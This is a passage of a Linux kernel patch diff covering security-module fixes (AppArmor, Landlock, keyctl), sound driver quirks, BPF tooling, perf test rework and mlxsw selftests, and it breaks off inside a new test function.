+-echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -c -m32 -O0 -fstack-protector -mstack-protector-guard-reg=fs -mstack-protector-guard-symbol=__stack_chk_guard - -o - 2> /dev/null | grep -q "%fs"
++echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -m32 -O0 -fstack-protector -mstack-protector-guard-reg=fs -mstack-protector-guard-symbol=__stack_chk_guard - -o - 2> /dev/null | grep -q "%fs"
+diff --git a/scripts/gcc-x86_64-has-stack-protector.sh b/scripts/gcc-x86_64-has-stack-protector.sh
+index 75e4e22b986ad..f680bb01aeeb3 100755
+--- a/scripts/gcc-x86_64-has-stack-protector.sh
++++ b/scripts/gcc-x86_64-has-stack-protector.sh
+@@ -1,4 +1,4 @@
+ #!/bin/sh
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -c -m64 -O0 -mcmodel=kernel -fno-PIE -fstack-protector - -o - 2> /dev/null | grep -q "%gs"
++echo "int foo(void) { char X[200]; return 3; }" | $* -S -x c -m64 -O0 -mcmodel=kernel -fno-PIE -fstack-protector - -o - 2> /dev/null | grep -q "%gs"
+diff --git a/security/apparmor/lsm.c b/security/apparmor/lsm.c
+index 1e2f40db15c58..97389b9c41290 100644
+--- a/security/apparmor/lsm.c
++++ b/security/apparmor/lsm.c
+@@ -1081,6 +1081,13 @@ static int apparmor_socket_sock_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ 	if (!skb->secmark)
+ 		return 0;
+ 
++	/*
++	 * If we reach here before the socket_post_create hook has been
++	 * called, the label is still null; drop the packet.
++	 */
++	if (!ctx->label)
++		return -EACCES;
++
+ 	return apparmor_secmark_check(ctx->label, OP_RECVMSG, AA_MAY_RECEIVE,
+ 				      skb->secmark, sk);
+ }
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index c7b84fb568414..4ee5a450d1187 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -187,7 +187,7 @@ static void aa_free_data(void *ptr, void *arg)
+ {
+ 	struct aa_data *data = ptr;
+ 
+-	kfree_sensitive(data->data);
++	kvfree_sensitive(data->data, data->size);
+ 	kfree_sensitive(data->key);
+ 	kfree_sensitive(data);
+ }
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 633e778ec3692..17601235ff982 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -898,6 +898,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 
+ 			if (rhashtable_insert_fast(profile->data, &data->head,
+ 						   profile->data->p)) {
++				kvfree_sensitive(data->data, data->size);
+ 				kfree_sensitive(data->key);
+ 				kfree_sensitive(data);
+ 				info = "failed to insert data to table";
+diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
+index 19be69fa4d052..aa1dc43b16ddf 100644
+--- a/security/keys/keyctl.c
++++ b/security/keys/keyctl.c
+@@ -1694,7 +1694,7 @@ long keyctl_session_to_parent(void)
+ 		goto unlock;
+ 
+ 	/* cancel an already pending keyring replacement */
+-	oldwork = task_work_cancel(parent, key_change_session_keyring);
++	oldwork = task_work_cancel_func(parent, key_change_session_keyring);
+ 
+ 	/* the replacement session keyring is applied just prior to userspace
+ 	 * restarting */
+diff --git a/security/landlock/cred.c b/security/landlock/cred.c
+index ec6c37f04a191..e215607fd46c7 100644
+--- a/security/landlock/cred.c
++++ b/security/landlock/cred.c
+@@ -14,8 +14,8 @@
+ #include "ruleset.h"
+ #include "setup.h"
+ 
+-static int hook_cred_prepare(struct cred *const new,
+-			     const struct cred *const old, const gfp_t gfp)
++static void hook_cred_transfer(struct cred *const new,
++			       const struct cred *const old)
+ {
+ 	struct landlock_ruleset *const old_dom = landlock_cred(old)->domain;
+ 
+@@ -23,6 +23,12 @@ static int hook_cred_prepare(struct cred *const new,
+ 		landlock_get_ruleset(old_dom);
+ 		landlock_cred(new)->domain = old_dom;
+ 	}
++}
++
++static int hook_cred_prepare(struct cred *const new,
++			     const struct cred *const old, const gfp_t gfp)
++{
++	hook_cred_transfer(new, old);
+ 	return 0;
+ }
+ 
+@@ -36,6 +42,7 @@ static void hook_cred_free(struct cred *const cred)
+ 
+ static struct security_hook_list landlock_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(cred_prepare, hook_cred_prepare),
++	LSM_HOOK_INIT(cred_transfer, hook_cred_transfer),
+ 	LSM_HOOK_INIT(cred_free, hook_cred_free),
+ };
+ 
+diff --git a/sound/soc/amd/acp-es8336.c b/sound/soc/amd/acp-es8336.c
+index 89499542c803f..f91a3c13ac235 100644
+--- a/sound/soc/amd/acp-es8336.c
++++ b/sound/soc/amd/acp-es8336.c
+@@ -203,8 +203,10 @@ static int st_es8336_late_probe(struct snd_soc_card *card)
+ 
+ 	codec_dev = acpi_get_first_physical_node(adev);
+ 	acpi_dev_put(adev);
+-	if (!codec_dev)
++	if (!codec_dev) {
+ 		dev_err(card->dev, "can not find codec dev\n");
++		return -ENODEV;
++	}
+ 
+ 	ret = devm_acpi_dev_add_driver_gpios(codec_dev, acpi_es8336_gpios);
+ 	if (ret)
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 8e3eccb4faa72..c438fccac8e98 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -220,6 +220,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21M5"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/max98088.c b/sound/soc/codecs/max98088.c
+index 405ec16be2b6a..eaabfe2cfd70d 100644
+--- a/sound/soc/codecs/max98088.c
++++ b/sound/soc/codecs/max98088.c
+@@ -1318,6 +1318,7 @@ static int max98088_set_bias_level(struct snd_soc_component *component,
+                                   enum snd_soc_bias_level level)
+ {
+ 	struct max98088_priv *max98088 = snd_soc_component_get_drvdata(component);
++	int ret;
+ 
+ 	switch (level) {
+ 	case SND_SOC_BIAS_ON:
+@@ -1333,10 +1334,13 @@ static int max98088_set_bias_level(struct snd_soc_component *component,
+ 		 */
+ 		if (!IS_ERR(max98088->mclk)) {
+ 			if (snd_soc_component_get_bias_level(component) ==
+-			    SND_SOC_BIAS_ON)
++			    SND_SOC_BIAS_ON) {
+ 				clk_disable_unprepare(max98088->mclk);
+-			else
+-				clk_prepare_enable(max98088->mclk);
++			} else {
++				ret = clk_prepare_enable(max98088->mclk);
++				if (ret)
++					return ret;
++			}
+ 		}
+ 		break;
+ 
+diff --git a/sound/soc/intel/common/soc-intel-quirks.h b/sound/soc/intel/common/soc-intel-quirks.h
+index de4e550c5b34d..42bd51456b945 100644
+--- a/sound/soc/intel/common/soc-intel-quirks.h
++++ b/sound/soc/intel/common/soc-intel-quirks.h
+@@ -11,7 +11,7 @@
+ 
+ #include <linux/platform_data/x86/soc.h>
+ 
+-#if IS_ENABLED(CONFIG_X86)
++#if IS_REACHABLE(CONFIG_IOSF_MBI)
+ 
+ #include <linux/dmi.h>
+ #include <asm/iosf_mbi.h>
+diff --git a/sound/soc/qcom/lpass-cpu.c b/sound/soc/qcom/lpass-cpu.c
+index dbdaaa85ce481..4387cca893c5d 100644
+--- a/sound/soc/qcom/lpass-cpu.c
++++ b/sound/soc/qcom/lpass-cpu.c
+@@ -1160,9 +1160,13 @@ int asoc_qcom_lpass_cpu_platform_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "lpass-rxtx-cdc-dma-lpm");
++		if (!res)
++			return -EINVAL;
+ 		drvdata->rxtx_cdc_dma_lpm_buf = res->start;
+ 
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "lpass-va-cdc-dma-lpm");
++		if (!res)
++			return -EINVAL;
+ 		drvdata->va_cdc_dma_lpm_buf = res->start;
+ 	}
+ 
+diff --git a/sound/soc/sof/imx/imx8m.c b/sound/soc/sof/imx/imx8m.c
+index 1243f8a6141ea..186ba4bbb5b26 100644
+--- a/sound/soc/sof/imx/imx8m.c
++++ b/sound/soc/sof/imx/imx8m.c
+@@ -243,7 +243,7 @@ static int imx8m_probe(struct snd_sof_dev *sdev)
+ 	/* set default mailbox offset for FW ready message */
+ 	sdev->dsp_box.offset = MBOX_OFFSET;
+ 
+-	priv->regmap = syscon_regmap_lookup_by_compatible("fsl,dsp-ctrl");
++	priv->regmap = syscon_regmap_lookup_by_phandle(np, "fsl,dsp-ctrl");
+ 	if (IS_ERR(priv->regmap)) {
+ 		dev_err(sdev->dev, "cannot find dsp-ctrl registers");
+ 		ret = PTR_ERR(priv->regmap);
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 783a2493707ea..5699a62d17679 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -1211,6 +1211,13 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval,
+ 			cval->res = 16;
+ 		}
+ 		break;
++	case USB_ID(0x1bcf, 0x2281): /* HD Webcam */
++		if (!strcmp(kctl->id.name, "Mic Capture Volume")) {
++			usb_audio_info(chip,
++				"set resolution quirk: cval->res = 16\n");
++			cval->res = 16;
++		}
++		break;
+ 	}
+ }
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index b8a474a2e4d59..733a25275fe9f 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2083,6 +2083,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x0b0e, 0x0349, /* Jabra 550a */
+ 		   QUIRK_FLAG_CTL_MSG_DELAY_1M),
++	DEVICE_FLG(0x0c45, 0x6340, /* Sonix HD USB Camera */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+@@ -2125,6 +2127,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x19f7, 0x0035, /* RODE NT-USB+ */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x1bcf, 0x2281, /* HD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	DEVICE_FLG(0x2040, 0x7200, /* Hauppauge HVR-950Q */
+diff --git a/tools/bpf/bpftool/common.c b/tools/bpf/bpftool/common.c
+index e7a11cff7245a..db02b000fbebd 100644
+--- a/tools/bpf/bpftool/common.c
++++ b/tools/bpf/bpftool/common.c
+@@ -333,7 +333,7 @@ void get_prog_full_name(const struct bpf_prog_info *prog_info, int prog_fd,
+ {
+ 	const char *prog_name = prog_info->name;
+ 	const struct btf_type *func_type;
+-	const struct bpf_func_info finfo = {};
++	struct bpf_func_info finfo = {};
+ 	struct bpf_prog_info info = {};
+ 	__u32 info_len = sizeof(info);
+ 	struct btf *prog_btf = NULL;
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 7e0b846e17eef..21817eb510396 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -1707,6 +1707,10 @@ static int load_with_options(int argc, char **argv, bool first_prog_only)
+ 	}
+ 
+ 	if (pinmaps) {
++		err = create_and_mount_bpffs_dir(pinmaps);
++		if (err)
++			goto err_unpin;
++
+ 		err = bpf_object__pin_maps(obj, pinmaps);
+ 		if (err) {
+ 			p_err("failed to pin all maps");
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 82bffa7cf8659..7775040182e39 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -696,7 +696,7 @@ static int sets_patch(struct object *obj)
+ 			 * Make sure id is at the beginning of the pairs
+ 			 * struct, otherwise the below qsort would not work.
+ 			 */
+-			BUILD_BUG_ON(set8->pairs != &set8->pairs[0].id);
++			BUILD_BUG_ON((u32 *)set8->pairs != &set8->pairs[0].id);
+ 			qsort(set8->pairs, set8->cnt, sizeof(set8->pairs[0]), cmp_id);
+ 
+ 			/*
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 713264899250a..cfdee656789b2 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1521,10 +1521,12 @@ static void btf_dump_emit_type_chain(struct btf_dump *d,
+ 			 * Clang for BPF target generates func_proto with no
+ 			 * args as a func_proto with a single void arg (e.g.,
+ 			 * `int (*f)(void)` vs just `int (*f)()`). We are
+-			 * going to pretend there are no args for such case.
++			 * going to emit the valid empty-args syntax, (void),
++			 * for such a case. Conveniently, the valid no-args
++			 * case can be special-cased here as well.
+ 			 */
+-			if (vlen == 1 && p->type == 0) {
+-				btf_dump_printf(d, ")");
++			if (vlen == 0 || (vlen == 1 && p->type == 0)) {
++				btf_dump_printf(d, "void)");
+ 				return;
+ 			}
+ 
+diff --git a/tools/lib/bpf/linker.c b/tools/lib/bpf/linker.c
+index 4ac02c28e152a..8a7cb830bff14 100644
+--- a/tools/lib/bpf/linker.c
++++ b/tools/lib/bpf/linker.c
+@@ -2189,10 +2189,17 @@ static int linker_fixup_btf(struct src_obj *obj)
+ 		vi = btf_var_secinfos(t);
+ 		for (j = 0, m = btf_vlen(t); j < m; j++, vi++) {
+ 			const struct btf_type *vt = btf__type_by_id(obj->btf, vi->type);
+-			const char *var_name = btf__str_by_offset(obj->btf, vt->name_off);
+-			int var_linkage = btf_var(vt)->linkage;
++			const char *var_name;
++			int var_linkage;
+ 			Elf64_Sym *sym;
+ 
++			/* could be a variable or function */
++			if (!btf_is_var(vt))
++				continue;
++
++			var_name = btf__str_by_offset(obj->btf, vt->name_off);
++			var_linkage = btf_var(vt)->linkage;
++
+ 			/* no need to patch up static or extern vars */
+ 			if (var_linkage != BTF_VAR_GLOBAL_ALLOCATED)
+ 				continue;
+diff --git a/tools/memory-model/lock.cat b/tools/memory-model/lock.cat
+index 6b52f365d73ac..9f3b5b38221bf 100644
+--- a/tools/memory-model/lock.cat
++++ b/tools/memory-model/lock.cat
+@@ -102,19 +102,19 @@ let rf-lf = rfe-lf | rfi-lf
+  * within one of the lock's critical sections returns False.
+  *)
+ 
+-(* rfi for RU events: an RU may read from the last po-previous UL *)
+-let rfi-ru = ([UL] ; po-loc ; [RU]) \ ([UL] ; po-loc ; [LKW] ; po-loc)
+-
+-(* rfe for RU events: an RU may read from an external UL or the initial write *)
+-let all-possible-rfe-ru =
+-	let possible-rfe-ru r =
++(*
++ * rf for RU events: an RU may read from an external UL or the initial write,
++ * or from the last po-previous UL
++ *)
++let all-possible-rf-ru =
++	let possible-rf-ru r =
+ 		let pair-to-relation p = p ++ 0
+-		in map pair-to-relation (((UL | IW) * {r}) & loc & ext)
+-	in map possible-rfe-ru RU
++		in map pair-to-relation ((((UL | IW) * {r}) & loc & ext) |
++			(((UL * {r}) & po-loc) \ ([UL] ; po-loc ; [LKW] ; po-loc)))
++	in map possible-rf-ru RU
+ 
+ (* Generate all rf relations for RU events *)
+-with rfe-ru from cross(all-possible-rfe-ru)
+-let rf-ru = rfe-ru | rfi-ru
++with rf-ru from cross(all-possible-rf-ru)
+ 
+ (* Final rf relation *)
+ let rf = rf | rf-lf | rf-ru
+diff --git a/tools/perf/arch/x86/util/intel-pt.c b/tools/perf/arch/x86/util/intel-pt.c
+index af102f471e9f4..9daec588103bc 100644
+--- a/tools/perf/arch/x86/util/intel-pt.c
++++ b/tools/perf/arch/x86/util/intel-pt.c
+@@ -32,6 +32,7 @@
+ #include "../../../util/tsc.h"
+ #include <internal/lib.h> // page_size
+ #include "../../../util/intel-pt.h"
++#include <api/fs/fs.h>
+ 
+ #define KiB(x) ((x) * 1024)
+ #define MiB(x) ((x) * 1024 * 1024)
+@@ -440,6 +441,16 @@ static int intel_pt_track_switches(struct evlist *evlist)
+ 	return 0;
+ }
+ 
++static bool intel_pt_exclude_guest(void)
++{
++	int pt_mode;
++
++	if (sysfs__read_int("module/kvm_intel/parameters/pt_mode", &pt_mode))
++		pt_mode = 0;
++
++	return pt_mode == 1;
++}
++
+ static void intel_pt_valid_str(char *str, size_t len, u64 valid)
+ {
+ 	unsigned int val, last = 0, state = 1;
+@@ -643,6 +654,7 @@ static int intel_pt_recording_options(struct auxtrace_record *itr,
+ 			}
+ 			evsel->core.attr.freq = 0;
+ 			evsel->core.attr.sample_period = 1;
++			evsel->core.attr.exclude_guest = intel_pt_exclude_guest();
+ 			evsel->no_aux_samples = true;
+ 			evsel->needs_auxtrace_mmap = true;
+ 			intel_pt_evsel = evsel;
+@@ -780,7 +792,8 @@ static int intel_pt_recording_options(struct auxtrace_record *itr,
+ 	}
+ 
+ 	if (!opts->auxtrace_snapshot_mode && !opts->auxtrace_sample_mode) {
+-		u32 aux_watermark = opts->auxtrace_mmap_pages * page_size / 4;
++		size_t aw = opts->auxtrace_mmap_pages * (size_t)page_size / 4;
++		u32 aux_watermark = aw > UINT_MAX ? UINT_MAX : aw;
+ 
+ 		intel_pt_evsel->core.attr.aux_watermark = aux_watermark;
+ 	}
+diff --git a/tools/perf/tests/shell/test_arm_callgraph_fp.sh b/tools/perf/tests/shell/test_arm_callgraph_fp.sh
+index ec108d45d3c61..60cd35c73e47d 100755
+--- a/tools/perf/tests/shell/test_arm_callgraph_fp.sh
++++ b/tools/perf/tests/shell/test_arm_callgraph_fp.sh
+@@ -4,65 +4,31 @@
+ 
+ lscpu | grep -q "aarch64" || exit 2
+ 
+-if ! [ -x "$(command -v cc)" ]; then
+-	echo "failed: no compiler, install gcc"
+-	exit 2
+-fi
+-
+ PERF_DATA=$(mktemp /tmp/__perf_test.perf.data.XXXXX)
+-TEST_PROGRAM_SOURCE=$(mktemp /tmp/test_program.XXXXX.c)
+-TEST_PROGRAM=$(mktemp /tmp/test_program.XXXXX)
++TEST_PROGRAM="perf test -w leafloop"
+ 
+ cleanup_files()
+ {
+-	rm -f $PERF_DATA
+-	rm -f $TEST_PROGRAM_SOURCE
+-	rm -f $TEST_PROGRAM
+-}
+-
+-trap cleanup_files exit term int
+-
+-cat << EOF > $TEST_PROGRAM_SOURCE
+-int a = 0;
+-void leaf(void) {
+-  for (;;)
+-    a += a;
++	rm -f "$PERF_DATA"
+ }
+-void parent(void) {
+-  leaf();
+-}
+-int main(void) {
+-  parent();
+-  return 0;
+-}
+-EOF
+-
+-echo " + Compiling test program ($TEST_PROGRAM)..."
+-
+-CFLAGS="-g -O0 -fno-inline -fno-omit-frame-pointer"
+-cc $CFLAGS $TEST_PROGRAM_SOURCE -o $TEST_PROGRAM || exit 1
+ 
+-# Add a 1 second delay to skip samples that are not in the leaf() function
+-perf record -o $PERF_DATA --call-graph fp -e cycles//u -D 1000 --user-callchains -- $TEST_PROGRAM 2> /dev/null &
+-PID=$!
++trap cleanup_files EXIT TERM INT
+ 
+-echo " + Recording (PID=$PID)..."
+-sleep 2
+-echo " + Stopping perf-record..."
++# shellcheck disable=SC2086
++perf record -o "$PERF_DATA" --call-graph fp -e cycles//u --user-callchains -- $TEST_PROGRAM
+ 
+-kill $PID
+-wait $PID
++# Try opening the file so any immediate errors are visible in the log
++perf script -i "$PERF_DATA" -F comm,ip,sym | head -n4
+ 
+-# expected perf-script output:
++# expected perf-script output if 'leaf' has been inserted correctly:
+ #
+-# program
++# perf
+ # 	728 leaf
+ # 	753 parent
+-# 	76c main
+-# ...
++# 	76c leafloop
++# ... remaining stack to main() ...
+ 
+-perf script -i $PERF_DATA -F comm,ip,sym | head -n4
+-perf script -i $PERF_DATA -F comm,ip,sym | head -n4 | \
+-	awk '{ if ($2 != "") sym[i++] = $2 } END { if (sym[0] != "leaf" ||
+-						       sym[1] != "parent" ||
+-						       sym[2] != "main") exit 1 }'
++# Each frame is separated by a tab, some spaces and an address
++SEP="[[:space:]]+ [[:xdigit:]]+"
++perf script -i "$PERF_DATA" -F comm,ip,sym | tr '\n' ' ' | \
++	grep -E -q "perf $SEP leaf $SEP parent $SEP leafloop"
+diff --git a/tools/perf/tests/workloads/leafloop.c b/tools/perf/tests/workloads/leafloop.c
+index 1bf5cc97649b0..f7561767e32cd 100644
+--- a/tools/perf/tests/workloads/leafloop.c
++++ b/tools/perf/tests/workloads/leafloop.c
+@@ -1,6 +1,8 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
++#include <signal.h>
+ #include <stdlib.h>
+ #include <linux/compiler.h>
++#include <unistd.h>
+ #include "../tests.h"
+ 
+ /* We want to check these symbols in perf script */
+@@ -8,10 +10,16 @@ noinline void leaf(volatile int b);
+ noinline void parent(volatile int b);
+ 
+ static volatile int a;
++static volatile sig_atomic_t done;
++
++static void sighandler(int sig __maybe_unused)
++{
++	done = 1;
++}
+ 
+ noinline void leaf(volatile int b)
+ {
+-	for (;;)
++	while (!done)
+ 		a += b;
+ }
+ 
+@@ -22,12 +30,16 @@ noinline void parent(volatile int b)
+ 
+ static int leafloop(int argc, const char **argv)
+ {
+-	int c = 1;
++	int sec = 1;
+ 
+ 	if (argc > 0)
+-		c = atoi(argv[0]);
++		sec = atoi(argv[0]);
++
++	signal(SIGINT, sighandler);
++	signal(SIGALRM, sighandler);
++	alarm(sec);
+ 
+-	parent(c);
++	parent(sec);
+ 	return 0;
+ }
+ 
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 6882b17144994..1821c81892df5 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -275,7 +275,7 @@ sort__sym_cmp(struct hist_entry *left, struct hist_entry *right)
+ 	 * comparing symbol address alone is not enough since it's a
+ 	 * relative address within a dso.
+ 	 */
+-	if (!hists__has(left->hists, dso) || hists__has(right->hists, dso)) {
++	if (!hists__has(left->hists, dso)) {
+ 		ret = sort__dso_cmp(left, right);
+ 		if (ret != 0)
+ 			return ret;
+diff --git a/tools/testing/selftests/bpf/prog_tests/sk_lookup.c b/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
+index 597d0467a9267..de2466547efe0 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
++++ b/tools/testing/selftests/bpf/prog_tests/sk_lookup.c
+@@ -994,7 +994,7 @@ static void drop_on_reuseport(const struct test *t)
+ 
+ 	err = update_lookup_map(t->sock_map, SERVER_A, server1);
+ 	if (err)
+-		goto detach;
++		goto close_srv1;
+ 
+ 	/* second server on destination address we should never reach */
+ 	server2 = make_server(t->sotype, t->connect_to.ip, t->connect_to.port,
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+index 39973ea1ce433..89366913a251c 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_adjust_tail.c
+@@ -217,7 +217,7 @@ static void test_xdp_adjust_frags_tail_grow(void)
+ 
+ 	prog = bpf_object__next_program(obj, NULL);
+ 	if (bpf_object__load(obj))
+-		return;
++		goto out;
+ 
+ 	prog_fd = bpf_program__fd(prog);
+ 
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
+index ba97165bdb282..a657651eba523 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_multidim.c
+@@ -14,9 +14,9 @@ typedef int *ptr_arr_t[6];
+ 
+ typedef int *ptr_multiarr_t[7][8][9][10];
+ 
+-typedef int * (*fn_ptr_arr_t[11])();
++typedef int * (*fn_ptr_arr_t[11])(void);
+ 
+-typedef int * (*fn_ptr_multiarr_t[12][13])();
++typedef int * (*fn_ptr_multiarr_t[12][13])(void);
+ 
+ struct root_struct {
+ 	arr_t _1;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
+index 4ee4748133fec..9355e323d40cf 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_syntax.c
+@@ -67,7 +67,7 @@ typedef void (*printf_fn_t)(const char *, ...);
+  *   `int -> char *` function and returns pointer to a char. Equivalent:
+  *   typedef char * (*fn_input_t)(int);
+  *   typedef char * (*fn_output_outer_t)(fn_input_t);
+- *   typedef const fn_output_outer_t (* fn_output_inner_t)();
++ *   typedef const fn_output_outer_t (* fn_output_inner_t)(void);
+  *   typedef const fn_output_inner_t fn_ptr_arr2_t[5];
+  */
+ /* ----- START-EXPECTED-OUTPUT ----- */
+@@ -94,7 +94,7 @@ typedef void (* (*signal_t)(int, void (*)(int)))(int);
+ 
+ typedef char * (*fn_ptr_arr1_t[10])(int **);
+ 
+-typedef char * (* (* const fn_ptr_arr2_t[5])())(char * (*)(int));
++typedef char * (* (* const fn_ptr_arr2_t[5])(void))(char * (*)(int));
+ 
+ struct struct_w_typedefs {
+ 	int_t a;
+diff --git a/tools/testing/selftests/bpf/test_sockmap.c b/tools/testing/selftests/bpf/test_sockmap.c
+index d56f521b8aaa2..25da05cad8f61 100644
+--- a/tools/testing/selftests/bpf/test_sockmap.c
++++ b/tools/testing/selftests/bpf/test_sockmap.c
+@@ -63,7 +63,7 @@ int passed;
+ int failed;
+ int map_fd[9];
+ struct bpf_map *maps[9];
+-int prog_fd[11];
++int prog_fd[9];
+ 
+ int txmsg_pass;
+ int txmsg_redir;
+@@ -680,7 +680,8 @@ static int msg_loop(int fd, int iov_count, int iov_length, int cnt,
+ 				}
+ 			}
+ 
+-			s->bytes_recvd += recv;
++			if (recv > 0)
++				s->bytes_recvd += recv;
+ 
+ 			if (opt->check_recved_len && s->bytes_recvd > total_bytes) {
+ 				errno = EMSGSIZE;
+@@ -1775,8 +1776,6 @@ int prog_attach_type[] = {
+ 	BPF_SK_MSG_VERDICT,
+ 	BPF_SK_MSG_VERDICT,
+ 	BPF_SK_MSG_VERDICT,
+-	BPF_SK_MSG_VERDICT,
+-	BPF_SK_MSG_VERDICT,
+ };
+ 
+ int prog_type[] = {
+@@ -1789,8 +1788,6 @@ int prog_type[] = {
+ 	BPF_PROG_TYPE_SK_MSG,
+ 	BPF_PROG_TYPE_SK_MSG,
+ 	BPF_PROG_TYPE_SK_MSG,
+-	BPF_PROG_TYPE_SK_MSG,
+-	BPF_PROG_TYPE_SK_MSG,
+ };
+ 
+ static int populate_progs(char *bpf_file)
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index 616d3581419ca..21d0f419cc6d7 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -11,7 +11,7 @@ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+ 	bloom_simple_test bloom_complex_test bloom_delta_test \
+-	max_erp_entries_test max_group_size_test"
++	max_erp_entries_test max_group_size_test collision_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -457,7 +457,7 @@ delta_two_masks_one_key_test()
+ {
+ 	# If 2 keys are the same and only differ in mask in a way that
+ 	# they belong under the same ERP (second is delta of the first),
+-	# there should be no C-TCAM spill.
++	# there should be a C-TCAM spill.
+ 
+ 	RET=0
+ 
+@@ -474,8 +474,8 @@ delta_two_masks_one_key_test()
+ 	tp_record "mlxsw:*" "tc filter add dev $h2 ingress protocol ip \
+ 		   pref 2 handle 102 flower $tcflags dst_ip 192.0.2.2 \
+ 		   action drop"
+-	tp_check_hits "mlxsw:mlxsw_sp_acl_atcam_entry_add_ctcam_spill" 0
+-	check_err $? "incorrect C-TCAM spill while inserting the second rule"
++	tp_check_hits "mlxsw:mlxsw_sp_acl_atcam_entry_add_ctcam_spill" 1
++	check_err $? "C-TCAM spill did not happen while inserting the second rule"
+ 
+ 	$MZ $h1 -c 1 -p 64 -a $h1mac -b $h2mac -A 192.0.2.1 -B 192.0.2.2 \
+ 		-t ip -q
+@@ -1087,6 +1087,53 @@ max_group_size_test()
+ 	log_test "max ACL group size test ($tcflags). max size $max_size"
+ }
+ 
++collision_test()
++{
++	# Filters cannot share an eRP if in the common unmasked part (i.e.,
++	# without the delta bits) they have the same values. If the driver does
++	# not prevent such configuration (by spilling into the C-TCAM), then
++	# multiple entries will be present in the device with the same key,
++	# leading to collisions and a reduced scale.
++	#
++	# Create such a scenario and make sure all the filters are successfully
++	# added.
++
++	RET=0
++
++	local ret
++
